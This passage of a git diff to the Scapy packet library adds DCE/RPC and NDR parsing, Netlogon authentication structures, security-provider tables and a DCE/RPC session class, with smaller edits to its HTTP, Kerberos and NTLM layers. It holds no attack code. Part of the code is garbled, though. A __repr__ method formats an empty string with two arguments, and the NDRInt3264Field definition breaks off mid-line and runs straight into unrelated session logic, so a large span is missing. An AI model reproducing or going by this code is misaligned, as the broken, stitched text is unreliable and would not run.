warnings.warn( - "All fields should have the same name in a MultipleTypeField", + ("All fields should have the same name in a " + "MultipleTypeField (%s)") % self.name, SyntaxWarning ) @@ -597,8 +598,8 @@ def __init__(self, fld, align, padwith=None): self._align = align self._padwith = padwith or b"\x00" - def padlen(self, flen): - # type: (int) -> int + def padlen(self, flen, pkt): + # type: (int, Packet) -> int return -flen % self._align def getfield(self, @@ -607,7 +608,7 @@ def getfield(self, ): # type: (...) -> Tuple[bytes, Any] remain, val = self.fld.getfield(pkt, s) - padlen = self.padlen(len(s) - len(remain)) + padlen = self.padlen(len(s) - len(remain), pkt) return remain[padlen:], val def addfield(self, @@ -619,7 +620,7 @@ def addfield(self, sval = self.fld.addfield(pkt, b"", val) return s + sval + struct.pack( "%is" % ( - self.padlen(len(sval)) + self.padlen(len(sval), pkt) ), self._padwith ) @@ -629,15 +630,18 @@ class ReversePadField(PadField): """Add bytes BEFORE the proxified field so that it starts at the specified alignment from its beginning""" + def original_length(self, pkt): + # type: (Packet) -> int + return len(pkt.original) + def getfield(self, pkt, # type: Packet s, # type: bytes ): # type: (...) -> Tuple[bytes, Any] # We need to get the length that has already been dissected - padlen = self.padlen(len(pkt.original) - len(s)) - remain, val = self.fld.getfield(pkt, s[padlen:]) - return remain, val + padlen = self.padlen(self.original_length(pkt) - len(s), pkt) + return self.fld.getfield(pkt, s[padlen:]) def addfield(self, pkt, # type: Packet @@ -647,7 +651,7 @@ def addfield(self, # type: (...) -> bytes sval = self.fld.addfield(pkt, b"", val) return s + struct.pack("%is" % ( - self.padlen(len(s)) + self.padlen(len(s), pkt) ), self._padwith) + sval @@ -1512,7 +1516,6 @@ def getfield(self, ): # type: (...) -> Tuple[bytes, K] i = self.m2i(pkt, s) - i.add_parent(pkt) remain = b"" if conf.padding_layer in i: r = i[conf.padding_layer] @@ -1721,7 +1724,7 @@ def i2len(self, val, # type: List[Packet] ): # type: (...) -> int - return sum(len(p) for p in val) + return sum(len(self.i2m(pkt, p)) for p in val) def getfield(self, pkt, s): # type: (Packet, bytes) -> Tuple[bytes, List[BasePacket]] @@ -1772,8 +1775,6 @@ def getfield(self, pkt, s): c += 1 else: remain = b"" - if isinstance(p, BasePacket): - p.add_parent(pkt) lst.append(p) return remain + ret, lst @@ -1803,6 +1804,7 @@ def __init__( super(StrFixedLenField, self).__init__(name, default) self.length_from = length_from or (lambda x: 0) if length is not None: + self.sz = length self.length_from = lambda x, length=length: length # type: ignore def i2repr(self, @@ -1834,6 +1836,10 @@ def randval(self): return RandBin(RandNum(0, 200)) +class StrFixedLenFieldUtf16(StrFixedLenField, StrFieldUtf16): + pass + + class StrFixedLenEnumField(_StrEnumField, StrFixedLenField): __slots__ = ["enum"] @@ -2117,6 +2123,10 @@ def randval(self): # type: () -> RandTermString return RandTermString(RandNum(0, 1200), self.DELIMITER) + def i2len(self, pkt, x): + # type: (Optional[Packet], Any) -> int + return super(StrNullField, self).i2len(pkt, x) + 1 + class StrNullFieldUtf16(StrNullField, StrFieldUtf16): DELIMITER = b"\x00\x00" @@ -2453,7 +2463,9 @@ def __init__(self, def any2i_one(self, pkt, x): # type: (Optional[Packet], Any) -> I - if isinstance(x, str): + if Enum and isinstance(x, Enum): + return cast(I, x.value) + elif isinstance(x, str): if self.s2i: x = self.s2i[x] elif self.s2i_cb: @@ -3351,7 +3363,7 @@ def i2repr(self, pkt, x): def i2m(self, pkt, x): # type: (Optional[Packet], Optional[float]) -> int if x is None: - x = time.time() + x = time.time() - self.delta if self.use_msec: x = x * 1e3 elif self.use_micro: @@ -3360,7 +3372,7 @@ def i2m(self, pkt, x): x = x * 1e9 elif self.custom_scaling: x = x * self.custom_scaling - return int(x) - self.delta + return int(x) return int(x) diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index c93eb38c3d4..72a9b695b17 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -11,19 +11,22 @@ DCE/RPC Distributed Computing Environment / Remote Procedure Calls -Based on [C706] - DCE/RPC 1.1 +Based on [C706] - aka DCE/RPC 1.1 https://pubs.opengroup.org/onlinepubs/9629399/toc.pdf """ -from collections import namedtuple -# from socket import socket +from functools import partial +from collections import namedtuple, deque + import struct from uuid import UUID +from scapy.base_classes import Packet_metaclass -# from scapy.automaton import ATMT, Automaton from scapy.config import conf -from scapy.layers.gssapi import GSSAPI_BLOB -from scapy.packet import Packet, Raw, bind_bottom_up, bind_layers +from scapy.error import log_runtime +from scapy.layers.dns import DNSStrField +from scapy.layers.ntlm import NTLM_Header +from scapy.packet import Packet, Raw, bind_bottom_up, bind_layers, bind_top_down from scapy.fields import ( _FieldContainer, BitEnumField, @@ -34,9 +37,17 @@ FieldLenField, FieldListField, FlagsField, + IEEEDoubleField, + IEEEFloatField, IntField, + LEIntEnumField, LEIntField, LELongField, + LEShortEnumField, + LEShortField, + LESignedIntField, + LESignedLongField, + LESignedShortField, LenField, MultipleTypeField, PacketField, @@ -46,16 +57,26 @@ ReversePadField, ShortEnumField, ShortField, + SignedByteField, StrFixedLenField, StrLenField, StrLenFieldUtf16, + StrNullField, + StrNullFieldUtf16, TrailerField, UUIDEnumField, UUIDField, XByteField, XLEIntField, + XLELongField, + XLEShortField, XShortField, + XStrFixedLenField, ) +from scapy.sessions import DefaultSession + +from scapy.layers.kerberos import KRB5_GSS_Wrap_RFC1964, KRB5_GSS_Wrap, Kerberos +from scapy.layers.gssapi import GSSAPI_BLOB from scapy.layers.inet import TCP from scapy.contrib.rtps.common_types import ( @@ -64,7 +85,8 @@ EPacketField, EPacketListField, ) -# from scapy.supersocket import StreamSocket + +import scapy.libs.six as six # DCE/RPC Packet @@ -157,7 +179,7 @@ def endianness(self): # sect 12.5 _drep = [ - BitEnumField("endian", 0, 4, ["big", "little"]), + BitEnumField("endian", 1, 4, ["big", "little"]), BitEnumField("encoding", 0, 4, ["ASCII", "EBCDIC"]), ByteEnumField("float", 0, ["IEEE", "VAX", "CRAY", "IBM"]), ByteField("reserved1", 0), @@ -199,24 +221,127 @@ class DceRpc4(Packet): ) +# Exceptionally, we define those 2 here. + + +class NetlogonAuthMessage(Packet): + # [MS-NRPC] sect 2.2.1.3.1 + name = "NL_AUTH_MESSAGE" + fields_desc = [ + LEIntEnumField( + "MessageType", + 0x00000000, + { + 0x00000000: "Request", + 0x00000001: "Response", + }, + ), + FlagsField( + "Flags", + 0, + -32, + [ + "NETBIOS_DOMAIN_NAME", + "NETBIOS_COMPUTER_NAME", + "DNS_DOMAIN_NAME", + "DNS_HOST_NAME", + "NETBIOS_COMPUTER_NAME_UTF8", + ], + ), + ConditionalField( + StrNullField("NetbiosDomainName", ""), + lambda pkt: pkt.Flags.NETBIOS_DOMAIN_NAME, + ), + ConditionalField( + StrNullField("NetbiosComputerName", ""), + lambda pkt: pkt.Flags.NETBIOS_COMPUTER_NAME, + ), + ConditionalField( + DNSStrField("DnsDomainName", ""), + lambda pkt: pkt.Flags.DNS_DOMAIN_NAME, + ), + ConditionalField( + DNSStrField("DnsHostName", ""), + lambda pkt: pkt.Flags.DNS_HOST_NAME, + ), + ConditionalField( + # What the fuck? Why are they doing this + # The spec is just wrong + DNSStrField("NetbiosComputerNameUtf8", ""), + lambda pkt: pkt.Flags.NETBIOS_COMPUTER_NAME_UTF8, + ), + ] + + +class NetlogonAuthSignature(Packet): + # [MS-NRPC] sect 2.2.1.3.2/2.2.1.3.3 + name = "NL_AUTH_(SHA2_)SIGNATURE" + fields_desc = [ + LEShortEnumField( + "SignatureAlgorithm", + 0x0077, + { + 0x0077: "HMAC-MD5", + 0x0013: "HMAC-SHA256", + }, + ), + LEShortEnumField( + "SealAlgorithm", + 0xFFFF, + { + 0xFFFF: "Unencrypted", + 0x007A: "RC4", + 0x00A1: "AES-128", + }, + ), + XLEShortField("Pad", 0xFFFF), + ShortField("Reserved", 0), + XLELongField("SequenceNumber", 0), + XStrFixedLenField("Checksum", b"", length=8), + XStrFixedLenField("Confounder", b"", length=8), + ConditionalField( + StrFixedLenField("Reserved2", b"", length=24), + lambda pkt: pkt.SignatureAlgorithm == 0x0013, + ), + ] + + # sect 13.2.6.1 +_MSRPCE_SECURITY_PROVIDERS = { + # [MS-RPCE] sect 2.2.1.1.7 + 0x00: "None", + 0x09: "SPNEGO", + 0x0A: "NTLM", + 0x0E: "TLS", + 0x10: "Kerberos", + 0x44: "Netlogon", + 0xFF: "NTLM", +} + +_MSRPCE_SECURITY_AUTHLEVELS = { + # [MS-RPCE] sect 2.2.1.1.7 + 0x00: "RPC_C_AUTHN_LEVEL_DEFAULT", + 0x01: "RPC_C_AUTHN_LEVEL_NONE", + 0x02: "RPC_C_AUTHN_LEVEL_CONNECT", + 0x03: "RPC_C_AUTHN_LEVEL_CALL", + 0x04: "RPC_C_AUTHN_LEVEL_PKT", + 0x05: "RPC_C_AUTHN_LEVEL_PKT_INTEGRITY", + 0x06: "RPC_C_AUTHN_LEVEL_PRIVACY", +} + + class CommonAuthVerifier(Packet): - name = "Common Authentication Verifier (auth_verifier_co_t)" + name = "Common Authentication Verifier (sec_trailer)" fields_desc = [ - ReversePadField( - ByteEnumField( - "auth_type", - 0, - { - 9: "SPNEGO", - }, - ), - align=4, + ByteEnumField( + "auth_type", + 0, + _MSRPCE_SECURITY_PROVIDERS, ), - ByteField("auth_level", 0), - ByteField("auth_pad_length", 0), + ByteEnumField("auth_level", 0, _MSRPCE_SECURITY_AUTHLEVELS), + ByteField("auth_pad_length", None), ByteField("auth_reserved", 0), XLEIntField("auth_context_id", 0), MultipleTypeField( @@ -228,8 +353,48 @@ class CommonAuthVerifier(Packet): GSSAPI_BLOB, length_from=lambda pkt: pkt.parent.auth_len, ), - lambda pkt: pkt.auth_type == 9, - ) + lambda pkt: pkt.auth_type == 0x09, + ), + ( + PacketLenField( + "auth_value", + NTLM_Header(), + NTLM_Header, + length_from=lambda pkt: pkt.parent.auth_len, + ), + lambda pkt: pkt.auth_type in [0x0A, 0xFF], + ), + ( + PacketLenField( + "auth_value", + Kerberos(), + Kerberos, + length_from=lambda pkt: pkt.parent.auth_len, + ), + lambda pkt: pkt.auth_type == 0x10, + ), + # NetLogon + ( + PacketLenField( + "auth_value", + NetlogonAuthMessage(), + NetlogonAuthMessage, + length_from=lambda pkt: pkt.parent.auth_len, + ), + lambda pkt: pkt.auth_type == 0x44 and + pkt.parent and + pkt.parent.ptype in [11, 12, 13], + ), + ( + PacketLenField( + "auth_value", + NetlogonAuthSignature(), + NetlogonAuthSignature, + length_from=lambda pkt: pkt.parent.auth_len, + ), + lambda pkt: pkt.auth_type == 0x44 and + (not pkt.parent or pkt.parent.ptype not in [11, 12, 13]), + ), ], PacketLenField( "auth_value", @@ -240,6 +405,14 @@ class CommonAuthVerifier(Packet): ), ] + def is_encrypted(self): + if self.auth_type == 9 and isinstance(self.auth_value, GSSAPI_BLOB): + return isinstance( + self.auth_value.innerContextToken, + (KRB5_GSS_Wrap_RFC1964, KRB5_GSS_Wrap), + ) + return False + # sect 12.6 @@ -266,15 +439,23 @@ class DceRpc5(Packet): ByteEnumField( "rpc_vers", 5, {4: "4 (connection-less)", 5: "5 (connection-oriented)"} ), - ByteField("rpc_vers_minor", 1), + ByteField("rpc_vers_minor", 0), ByteEnumField("ptype", 0, DCE_RPC_TYPE), FlagsField("pfc_flags", 0, 8, _DCE_RPC_5_FLAGS), ] + _drep + [ ByteField("reserved2", 0), - _EField(LenField("frag_len", None, fmt="H")), - _EField(LenField("auth_len", None, fmt="H")), + _EField(ShortField("frag_len", None)), + _EField( + FieldLenField( + "auth_len", + None, + fmt="H", + length_of="auth_verifier", + adjust=lambda pkt, x: 0 if not x else (x - 8), + ) + ), _EField(IntField("call_id", None)), ConditionalField( TrailerField( @@ -285,17 +466,74 @@ class DceRpc5(Packet): length_from=lambda pkt: pkt.auth_len + 8, ) ), - lambda pkt: pkt.auth_len, + lambda pkt: pkt.auth_len != 0, + ), + ConditionalField( + TrailerField( + StrLenField( + "auth_pad", + None, + length_from=lambda pkt: pkt.auth_verifier.auth_pad_length or 0, + ) + ), + lambda pkt: pkt.auth_verifier and pkt.auth_verifier.auth_pad_length, ), ] ) + def post_build(self, pkt, pay): + if self.auth_verifier and self.auth_pad is None: + # Compute auth_len and add padding + auth_len = self.get_field("auth_len").getfield(self, pkt[10:12])[1] + 8 + auth_verifier, pay = pay[-auth_len:], pay[:-auth_len] + padlen = (-(len(pkt) + len(pay) - 8)) % 16 + auth_verifier = ( + auth_verifier[:2] + struct.pack("B", padlen) + auth_verifier[3:] + ) + pay = pay + (padlen * b"\x00") + auth_verifier + if self.frag_len is None: + # Compute frag_len + length = len(pkt) + len(pay) + pkt = ( + pkt[:8] + + self.get_field("frag_len").addfield(self, b"", length) + + pkt[10:] + ) + return pkt + pay + + def answers(self, pkt): + return isinstance(pkt, DceRpc5) and pkt[DceRpc5].call_id == self.call_id + + @classmethod + def tcp_reassemble(cls, data, _, session): + if data[0:1] != b"\x05": + return + endian = struct.unpack("!B", data[4:5])[0] >> 4 + if endian not in [0, 1]: + return + length = struct.unpack(("<" if endian else ">") + "H", data[8:10])[0] + if len(data) == length: + # Start a DCE/RPC session for this TCP stream + dcerpc_session = session.get("dcerpc_session", None) + if not dcerpc_session: + dcerpc_session = session["dcerpc_session"] = DceRpcSession() + pkt = dcerpc_session._process_dcerpc_packet(DceRpc5(data)) + return pkt + # sec 12.6.3.1 + DCE_RPC_INTERFACES_NAMES = {} DCE_RPC_INTERFACES_NAMES_rev = {} +DCE_RPC_TRANSFER_SYNTAXES = { + UUID("00000000-0000-0000-0000-000000000000"): "NULL", + UUID("6cb71c2c-9812-4540-0300-000000000000"): "Bind Time Feature Negotiation", + UUID("8a885d04-1ceb-11c9-9fe8-08002b104860"): "NDR 2.0", + UUID("71710533-beba-4937-8319-b5dbef9ccc36"): "NDR64", +} + class DceRpc5AbstractSyntax(EPacket): name = "Presentation Syntax (p_syntax_id_t)" @@ -323,10 +561,7 @@ class DceRpc5TransferSyntax(EPacket): UUIDEnumField( "if_uuid", None, - { - UUID("8a885d04-1ceb-11c9-9fe8-08002b104860"): "NDR 2.0", - UUID("71710533-beba-4937-8319-b5dbef9ccc36"): "NDR64", - }, + DCE_RPC_TRANSFER_SYNTAXES, ) ), _EField(ShortField("if_version", 3)), @@ -338,7 +573,7 @@ class DceRpc5Context(EPacket): name = "Presentation Context (p_cont_elem_t)" fields_desc = [ _EField(ShortField("context_id", 0)), - FieldLenField("n_transfer_syn", None, length_of="transfer_syntaxes", fmt="B"), + FieldLenField("n_transfer_syn", None, count_of="transfer_syntaxes", fmt="B"), ByteField("reserved", 0), EPacketField("abstract_syntax", None, DceRpc5AbstractSyntax), EPacketListField( @@ -389,14 +624,18 @@ class DceRpc5PortAny(EPacket): class DceRpc5AlterContext(_DceRpcPayload): name = "DCE/RPC v5 - AlterContext" fields_desc = [ - _EField(ShortField("max_xmit_frag", 0)), - _EField(ShortField("max_recv_frag", 0)), + _EField(ShortField("max_xmit_frag", 5840)), + _EField(ShortField("max_recv_frag", 8192)), _EField(IntField("assoc_group_id", 0)), # p_result_list_t - _EField(FieldLenField("n_results", None, length_of="results", fmt="B")), + _EField(FieldLenField("n_results", None, count_of="results", fmt="B")), StrFixedLenField("reserved", 0, length=3), EPacketListField( - "results", [], DceRpc5Result, endianness_from=_dce_rpc_endianess + "results", + [], + DceRpc5Result, + count_from=lambda pkt: pkt.n_results, + endianness_from=_dce_rpc_endianess, ), ] @@ -410,18 +649,22 @@ class DceRpc5AlterContext(_DceRpcPayload): class DceRpc5AlterContextResp(_DceRpcPayload): name = "DCE/RPC v5 - AlterContextResp" fields_desc = [ - _EField(ShortField("max_xmit_frag", 0)), - _EField(ShortField("max_recv_frag", 0)), + _EField(ShortField("max_xmit_frag", 5840)), + _EField(ShortField("max_recv_frag", 8192)), _EField(IntField("assoc_group_id", 0)), PadField( EPacketField("sec_addr", None, DceRpc5PortAny), align=4, ), # p_result_list_t - _EField(FieldLenField("n_results", None, length_of="results", fmt="B")), + _EField(FieldLenField("n_results", None, count_of="results", fmt="B")), StrFixedLenField("reserved", 0, length=3), EPacketListField( - "results", [], DceRpc5Result, endianness_from=_dce_rpc_endianess + "results", + [], + DceRpc5Result, + count_from=lambda pkt: pkt.n_results, + endianness_from=_dce_rpc_endianess, ), ] @@ -434,12 +677,12 @@ class DceRpc5AlterContextResp(_DceRpcPayload): class DceRpc5Bind(_DceRpcPayload): name = "DCE/RPC v5 - Bind" fields_desc = [ - _EField(ShortField("max_xmit_frag", 0)), - _EField(ShortField("max_recv_frag", 0)), + _EField(ShortField("max_xmit_frag", 5840)), + _EField(ShortField("max_recv_frag", 8192)), _EField(IntField("assoc_group_id", 0)), # p_cont_list_t _EField( - FieldLenField("n_context_elem", None, length_of="context_elem", fmt="B") + FieldLenField("n_context_elem", None, count_of="context_elem", fmt="B") ), StrFixedLenField("reserved", 0, length=3), EPacketListField( @@ -460,24 +703,57 @@ class DceRpc5Bind(_DceRpcPayload): class DceRpc5BindAck(_DceRpcPayload): name = "DCE/RPC v5 - Bind Ack" fields_desc = [ - _EField(ShortField("max_xmit_frag", 0)), - _EField(ShortField("max_recv_frag", 0)), + _EField(ShortField("max_xmit_frag", 5840)), + _EField(ShortField("max_recv_frag", 8192)), _EField(IntField("assoc_group_id", 0)), PadField( EPacketField("sec_addr", None, DceRpc5PortAny), align=4, ), # p_result_list_t - _EField(FieldLenField("n_results", None, length_of="results", fmt="B")), + _EField(FieldLenField("n_results", None, count_of="results", fmt="B")), StrFixedLenField("reserved", 0, length=3), EPacketListField( - "results", [], DceRpc5Result, endianness_from=_dce_rpc_endianess + "results", + [], + DceRpc5Result, + endianness_from=_dce_rpc_endianess, + count_from=lambda pkt: pkt.n_results, ), ] bind_layers(DceRpc5, DceRpc5BindAck, ptype=12) +# sec 12.6.4.5 + + +class DceRpc5Version(EPacket): + name = "version_t" + fields_desc = [ + ByteField("major", 0), + ByteField("minor", 0), + ] + + +class DceRpc5BindNak(_DceRpcPayload): + name = "DCE/RPC v5 - Bind Nak" + fields_desc = [ + _EField(ShortField("provider_reject_reason", 0)), + # p_rt_versions_supported_t + _EField(FieldLenField("n_protocols", None, length_of="protocols", fmt="B")), + EPacketListField( + "protocols", + [], + DceRpc5Version, + count_from=lambda pkt: pkt.n_protocols, + endianness_from=_dce_rpc_endianess, + ), + ] + + +bind_layers(DceRpc5, DceRpc5BindNak, ptype=13) + # sec 12.6.4.9 @@ -520,6 +796,17 @@ class DceRpc5Response(_DceRpcPayload): DCE_RPC_INTERFACES = {} +class DceRpcInterface: + def __init__(self, name, uuid, version, opnums): + self.name = name + self.uuid = uuid + self.version, self.minor_version = map(int, version.split(".")) + self.opnums = opnums + + def __repr__(self): + return "" % (self.name, self.version) + + def register_dcerpc_interface(name, uuid, version, opnums): """ Register a DCE/RPC interface @@ -528,199 +815,665 @@ def register_dcerpc_interface(name, uuid, version, opnums): raise ValueError("Interface is already registered !") DCE_RPC_INTERFACES_NAMES[uuid] = "%s (v%s)" % (name.upper(), version) DCE_RPC_INTERFACES_NAMES_rev[name.upper()] = uuid - DCE_RPC_INTERFACES[uuid] = { - "name": name, - "uuid": uuid, - "version": version, - "opnums": opnums, - } - - -# --- NDR fields + DCE_RPC_INTERFACES[uuid] = DceRpcInterface( + name, + uuid, + version, + opnums, + ) + # bind for build + for opnum, operations in opnums.items(): + bind_top_down(DceRpc5Request, operations.request, opnum=opnum) -class NDRPacket(Packet): +def find_dcerpc_interface(name): """ - A NDR Packet. Handles pointer size & endianness + Find an interface object through the name in the IDL """ + try: + return next(x for x in DCE_RPC_INTERFACES.values() if x.name == name) + except StopIteration: + raise AttributeError("Unknown interface !") + + +# --- NDR fields - [C706] chap 14 + +def _set_ndr_on(f, ndr64): + if isinstance(f, _NDRPacket): + f.ndr64 = ndr64 + if isinstance(f, list): + for x in f: + if isinstance(x, _NDRPacket): + x.ndr64 = ndr64 + - __slots__ = ["ndr64"] +class _NDRPacket(Packet): + __slots__ = ["ndr64", "defered_pointers", "request_packet"] def __init__(self, *args, **kwargs): - self.ndr64 = kwargs.pop("ndr64", False) - super(NDRPacket, self).__init__(*args, **kwargs) + self.ndr64 = kwargs.pop("ndr64", True) + # request_packet is used in the session, so that a response packet + # can resolve union arms if the case parameter is in the request. + self.request_packet = kwargs.pop("request_packet", None) + self.defered_pointers = [] + super(_NDRPacket, self).__init__(*args, **kwargs) - def _update_fields(self): + def dissect(self, s): _up = self.parent or self.underlayer - if _up and isinstance(_up, NDRPacket): + if _up and isinstance(_up, _NDRPacket): self.ndr64 = _up.ndr64 - ptr_fmt = "<" + (self.ndr64 and "Q" or "I") - for f in self.fields_desc: - if isinstance(f, _NDR64Field): - f.set_fmt(ptr_fmt) - else: - f.fmt = "<" + (f.fmt[1:] if f.fmt[0] in ["!", "<", ">"] else f.fmt) + return super(_NDRPacket, self).dissect(s) - def build(self): - self._update_fields() - return super(NDRPacket, self).build() - - def dissect(self, s): - self._update_fields() - return super(NDRPacket, self).dissect(s) + def do_build(self): + for f in self.fields.values(): + _set_ndr_on(f, self.ndr64) + return super(_NDRPacket, self).do_build() def default_payload_class(self, pkt): return conf.padding_layer + def clone_with(self, *args, **kwargs): + pkt = super(_NDRPacket, self).clone_with(*args, **kwargs) + # We need to copy defered_pointers to not break pointer deferral + # on build. + pkt.defered_pointers = self.defered_pointers + pkt.ndr64 = self.ndr64 + return pkt + + def copy(self): + pkt = super(_NDRPacket, self).copy() + pkt.defered_pointers = self.defered_pointers + pkt.ndr64 = self.ndr64 + return pkt + + def getfield_and_val(self, attr): + try: + return Packet.getfield_and_val(self, attr) + except ValueError: + if self.request_packet: + # Try to resolve the field from the request on failure + try: + return self.request_packet.getfield_and_val(attr) + except AttributeError: + pass + raise + + +class _NDRAlign: + def padlen(self, flen, pkt): + return -flen % self._align[pkt.ndr64] + + def original_length(self, pkt): + # Find the length of the NDR frag to be able to pad properly + while pkt: + par = pkt.parent or pkt.underlayer + if par and isinstance(par, _NDRPacket): + pkt = par + else: + break + return len(pkt.original) + + +class NDRAlign(_NDRAlign, ReversePadField): + """ + ReversePadField modified to fit NDR. + + - If no align size is specified, use the one from the inner field + - Size is calculated from the beginning of the NDR stream + """ + + def __init__(self, fld, align, padwith=None): + super(NDRAlign, self).__init__(fld, align=align, padwith=padwith) + + +class _NDRPacketMetaclass(Packet_metaclass): + def __new__(cls, name, bases, dct): + newcls = super(_NDRPacketMetaclass, cls).__new__(cls, name, bases, dct) + conformants = dct.get("CONFORMANT_COUNT", 0) + if conformants: + if conformants == 1: + newcls.fields_desc.insert( + 0, + MultipleTypeField( + [ + ( + NDRLongField("max_count", 0), + lambda pkt: pkt and pkt.ndr64, + ) + ], + NDRIntField("max_count", 0), + ), + ) + else: + newcls.fields_desc.insert( + 0, + MultipleTypeField( + [ + ( + NDRAlign( + FieldListField( + "max_counts", + 0, + LELongField("", 0), + count_from=lambda _: conformants, + ), + align=(8, 8), + ), + lambda pkt: pkt and pkt.ndr64, + ) + ], + NDRAlign( + FieldListField( + "max_counts", + 0, + LEIntField("", 0), + count_from=lambda _: conformants, + ), + align=(4, 4), + ), + ), + ) + return newcls # type: ignore -class NDRAlign(PadField): + +@six.add_metaclass(_NDRPacketMetaclass) +class NDRPacket(_NDRPacket): """ - PadField but aligned on the size of the field. + A NDR Packet. Handles pointer size & endianness """ - def __init__(self, fld, **kwargs): - super(NDRAlign, self).__init__(fld, fld.sz, **kwargs) + __slots__ = ["_align"] + + # NDR64 pad structures + # [MS-RPCE] 2.2.5.3.4.1 + ALIGNMENT = (1, 1) + # Conformants max_count can be added to the beginning + CONFORMANT_COUNT = 0 + + +# Primitive types +NDRByteField = ByteField +NDRSignedByteField = SignedByteField -class _NDR64Field: - def set_fmt(self, fmt): - self.fmt = fmt - self.sz = struct.calcsize(self.fmt) +class NDRShortField(NDRAlign): + def __init__(self, *args, **kwargs): + super(NDRShortField, self).__init__(LEShortField(*args, **kwargs), align=(2, 2)) + + +class NDRSignedShortField(NDRAlign): + def __init__(self, *args, **kwargs): + super(NDRSignedShortField, self).__init__( + LESignedShortField(*args, **kwargs), align=(2, 2) + ) + +class NDRIntField(NDRAlign): + def __init__(self, *args, **kwargs): + super(NDRIntField, self).__init__(LEIntField(*args, **kwargs), align=(4, 4)) + + +class NDRSignedIntField(NDRAlign): + def __init__(self, *args, **kwargs): + super(NDRSignedIntField, self).__init__( + LESignedIntField(*args, **kwargs), align=(4, 4) + ) + + +class NDRLongField(NDRAlign): + def __init__(self, *args, **kwargs): + super(NDRLongField, self).__init__(LELongField(*args, **kwargs), align=(8, 8)) + + +class NDRSignedLongField(NDRAlign): + def __init__(self, *args, **kwargs): + super(NDRSignedLongField, self).__init__( + LESignedLongField(*args, **kwargs), align=(8, 8) + ) + + +class NDRIEEEFloatField(NDRAlign): + def __init__(self, *args, **kwargs): + super(NDRIEEEFloatField, self).__init__( + IEEEFloatField(*args, **kwargs), align=(4, 4) + ) + + +class NDRIEEEDoubleField(NDRAlign): + def __init__(self, *args, **kwargs): + super(NDRIEEEDoubleField, self).__init__( + IEEEDoubleField(*args, **kwargs), align=(8, 8) + ) + + +# Enum types + + +class NDRShortEnumField(NDRAlign): + def __init__(self, *args, **kwargs): + super(NDRShortEnumField, self).__init__( + LEShortEnumField(*args, **kwargs), align=(2, 2) + ) -class NDRPointer(NDRPacket): + +class NDRIntEnumField(NDRAlign): + def __init__(self, *args, **kwargs): + super(NDRIntEnumField, self).__init__( + LEIntEnumField(*args, **kwargs), align=(4, 4) + ) + + +# Special types + + +class NDRInt3264Field(Field): + FMTS = [" get which RPC interface + for ctx in pkt.context_elem: + if_uuid = ctx.abstract_syntax.if_uuid + try: + self.rpc_bind_interface = DCE_RPC_INTERFACES[if_uuid] + except KeyError: + log_runtime.warning( + "Unknown RPC interface %s. Try loading the IDL" % if_uuid + ) + elif DceRpc5BindAck in pkt: + # bind ack => is it NDR64 + for res in pkt[DceRpc5BindAck].results: + if res.result == 0: # Accepted + if res.transfer_syntax.sprintf("%if_uuid%") == "NDR64": + self.ndr64 = True + elif DceRpc5Request in pkt: + # request => match opnum with callID + opnum = pkt.opnum + self.map_callid_opnum[pkt.call_id] = opnum, pkt[DceRpc5Request].payload + elif DceRpc5Response in pkt: + # response => get opnum from table + try: + opnum, opts["request_packet"] = self.map_callid_opnum[pkt.call_id] + del self.map_callid_opnum[pkt.call_id] + except KeyError: + log_runtime.info("Unknown call_id %s in DCE/RPC session" % pkt.call_id) + # Check for encrypted payloads + if pkt.auth_verifier and pkt.auth_verifier.is_encrypted(): + return pkt + # Try to parse the payload + if opnum is not None and self.rpc_bind_interface and conf.raw_layer in pkt: + # use opnum to parse the payload + is_response = DceRpc5Response in pkt + try: + cls = self.rpc_bind_interface.opnums[opnum][is_response] + except KeyError: + log_runtime.warning( + "Unknown opnum %s for interface %s" + % (opnum, self.rpc_bind_interface) + ) + return + # Dissect payload using class + payload = cls(pkt[conf.raw_layer].load, ndr64=self.ndr64, **opts) + pkt[conf.raw_layer].underlayer.remove_payload() + pkt = pkt / payload + return pkt + + def on_packet_received(self, pkt): + if DceRpc5 in pkt: + return super(DceRpcSession, self).on_packet_received( + self._process_dcerpc_packet(pkt) + ) + return super(DceRpcSession, self).on_packet_received(pkt) # --- TODO cleanup below diff --git a/scapy/layers/http.py b/scapy/layers/http.py index eb12d1c78ac..cd8f12d7af2 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -578,7 +578,7 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): # tcp_reassemble is used by TCPSession in session.py @classmethod - def tcp_reassemble(cls, data, metadata): + def tcp_reassemble(cls, data, metadata, _): detect_end = metadata.get("detect_end", None) is_unknown = metadata.get("detect_unknown", True) if not detect_end or is_unknown: diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 6145e88b84f..12ae7c4b408 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Gabriel Potter -# This program is published under a GPLv2 license +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter r""" Kerberos V5 @@ -1328,13 +1328,17 @@ class KRB_ERROR(ASN1_Packet): b"\x05\x04": "GSS_Wrap", } _SGN_ALGS = { - 0: "DES MAC MD5", - 1: "MD2.5", - 2: "DES MAC", + 0x00: "DES MAC MD5", + 0x01: "MD2.5", + 0x02: "DES MAC", + # RFC 4757 + 0x11: "HMAC", } _SEAL_ALGS = { 0: "DES", 0xFFFF: "none", + # RFC 4757 + 0x10: "RC4", } diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index dc318b8ed58..6c79deb44a9 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -101,40 +101,6 @@ def __init__(self, if field.default is not None] ) - def m2i(self, pkt, x): - # type: (Optional[Packet], bytes) -> List[Tuple[str, str]] - if not pkt or not x: - return [] - results = [] - for field in self.fields: - offset = pkt.getfieldval(field.name + "BufferOffset") - self.offset - try: - length = pkt.getfieldval(field.name + "Len") - except AttributeError: - length = len(x) - offset - if offset < 0: - continue - if x[offset:offset + length]: - results.append((offset, field.name, field.getfield( - pkt, x[offset:offset + length])[1])) - results.sort(key=lambda x: x[0]) - return [x[1:] for x in results] - - def i2m(self, pkt, x): - # type: (Optional[Packet], Optional[List[Tuple[str, str]]]) -> bytes - buf = StringBuffer() - for field_name, value in x: - if field_name not in self.fields_map: - continue - field = self.fields_map[field_name] - offset = pkt.getfieldval(field_name + "BufferOffset") - if offset is not None: - offset -= self.offset - else: 